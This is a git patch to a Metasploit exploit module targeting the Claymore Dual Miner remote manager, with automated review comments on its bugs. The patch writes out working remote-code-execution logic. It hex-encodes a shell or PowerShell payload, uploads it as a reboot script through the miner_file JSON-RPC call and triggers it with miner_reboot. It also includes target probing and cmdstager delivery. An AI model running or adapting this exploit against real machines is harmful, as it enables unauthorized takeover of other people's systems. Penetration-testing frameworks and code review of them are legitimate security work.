From 53f158ef4ffe0f28714ddf49dda0e1440055222a Mon Sep 17 00:00:00 2001 From: phra Date: Wed, 27 Jun 2018 17:11:47 +0200 Subject: [PATCH] refactor: universal check, payload platform check --- .../claymore_dual_miner_remote_manager_rce.rb | 142 +++++++++++------- 1 file changed, 85 insertions(+), 57 deletions(-) diff --git a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb index 915ba44741..703c479238 100644 --- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb +++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb @@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['win', 'linux'], 'Targets' => [ + [ 'Automatic Target', { 'auto' => true }], [ 'Linux', { 'Platform' => 'linux', - 'Arch' => ARCH_X64 + 'Arch' => ARCH_X64, + 'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ] } ], [ 'Windows', { 'Platform' => 'windows', - 'Arch' => ARCH_X64 + 'Arch' => ARCH_X64, + 'CmdStagerFlavor' => [ 'certutil', 'vbs' ] } ] ], 
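Review bot: The new `'auto' => true` entry and the per-target `CmdStagerFlavor` lists are not consulted by the code this patch adds. `exploit` and `execute_command` always call `select_target`, so choosing the 'Linux' or 'Windows' target by hand has no effect, and `execute_cmdstager` is called with a fixed `flavor: :echo` / `flavor: :vbs`. Either honour the selection, e.g. `chosen = target['auto'] ? select_target : target`, and drop the hard-coded `flavor:` arguments so the declared lists can apply, or remove the metadata that is never read. The surrounding `initialize` hash starts and ends outside this hunk.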
@@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST') end - def execute_command(cmd, opts = {}) - case target['Platform'] - when 'linux' - cmd = Rex::Text.to_hex(cmd, '') - when 'windows' - cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '') - end - case target['Platform'] - when 'linux' - upload = { - "id" => 0, - "jsonrpc" => '2.0', - "method" => 'miner_file', - "params" => ['reboot.bash', "#{cmd}"] - }.to_json - when 'windows' - upload = { - "id" => 0, - "jsonrpc" => '2.0', - "method" => 'miner_file', - "params" => ['reboot.bat', "#{cmd}"] - }.to_json - end - begin - connect - sock.put(upload) - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - print_error(e) - ensure - disconnect - end - trigger_vulnerability - end - - def trigger_vulnerability - execute = { + def select_target + data = { "id" => 0, "jsonrpc" => '2.0', - "method" => 'miner_reboot' + "method" => 'miner_getfile', + "params" => ['config.txt'] }.to_json connect - sock.put(execute) + sock.put(data) buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - print_error(e) - ensure - disconnect - end - - def exploit - case target['Platform'] - when 'linux' - execute_cmdstager - when 'windows' - execute_cmdstager(linemax: 20000) + tmp = StringIO.new + tmp << buf + tmp2 = tmp.string + hex = '' + if tmp2.scan(/\w+/)[5] + return self.targets[1] + elsif tmp2.scan(/\w+/)[7] + return self.targets[2] + else + return nil end end def check + target = select_target + if target.nil? + return Exploit::CheckCode::Safe + end data = { "id" => 0, "jsonrpc" => '2.0', 
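Review bot: In `select_target` the `elsif tmp2.scan(/\w+/)[7]` branch is unreachable: a token list with an element at index 7 always has one at index 5, so the method returns `targets[1]` or `nil` and never `targets[2]`. The platform decision needs a test that actually differs between the two replies, and the reply format is not visible in this patch, so that has to come from the author. The method also calls `connect` without a matching `disconnect`, while `execute_command` calls `connect` again right after it; ending the method with `ensure` / `disconnect` would close the probe connection. `check` continues past this hunk, and because the next hunk removes its `if not hex` guard, `Rex::Text.hex_to_raw(hex)` can still receive `nil` when the reply that `check` reads itself is empty or shaped differently, so I would keep that guard. `hex = ''` is unused and the `StringIO` round trip can be `tokens = buf.scan(/\w+/)`.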
@@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote when 'windows' hex = tmp2.scan(/\w+/)[7] end - if not hex - return Exploit::CheckCode::Safe - end str = Rex::Text.hex_to_raw(hex) if str.include?('WARNING') return Exploit::CheckCode::Vulnerable 
@@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Detected end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - vprint_error(e) + vprint_error(e.message) return Exploit::CheckCode::Unknown ensure disconnect end + + def execute_command(cmd, opts = {}) + target = select_target + case target['Platform'] + when 'linux' + cmd = Rex::Text.to_hex(cmd, '') + upload = { + "id" => 0, + "jsonrpc" => '2.0', + "method" => 'miner_file', + "params" => ['reboot.bash', "#{cmd}"] + }.to_json + when 'windows' + cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '') + upload = { + "id" => 0, + "jsonrpc" => '2.0', + "method" => 'miner_file', + "params" => ['reboot.bat', "#{cmd}"] + }.to_json + end + + connect + sock.put(upload) + buf = sock.get_once || '' + trigger_vulnerability + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + fail_with(Failure::UnexpectedReply, e.message) + ensure + disconnect + end + + def trigger_vulnerability + execute = { + "id" => 0, + "jsonrpc" => '2.0', + "method" => 'miner_reboot' + }.to_json + connect + sock.put(execute) + buf = sock.get_once || '' + disconnect + end + + def exploit + target = select_target + if target.nil? + fail_with(Exploit::Failure::NoTarget, 'No matching target') + end + if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) || + (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i) + fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'" + end + case target['Platform'] + when 'linux' + execute_cmdstager(flavor: :echo, linemax: 100000) + when 'windows' + execute_cmdstager(flavor: :vbs, linemax: 100000) + end + end end
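Review bot: `execute_command` calls `select_target` again on every invocation and then indexes the result with `target['Platform']` without the `nil` check that `exploit` performs, so a failed probe raises `NoMethodError`, which the `rescue` list does not cover. Resolving the target once in `exploit` (`@resolved_target = select_target`) and reading `@resolved_target['Platform']` here avoids both the repeated request and the nil dereference; it also stops the local `target` from shadowing the framework accessor. The `rescue` maps connection failures to `Failure::UnexpectedReply`, where `fail_with(Failure::Unreachable, e.message)` describes them more accurately. `trigger_vulnerability` lost its own `rescue`/`ensure` and calls `connect` while the socket opened by `execute_command` is still in use, so it now depends on the caller's handler and, as far as this hunk shows, leaves the first socket to framework cleanup.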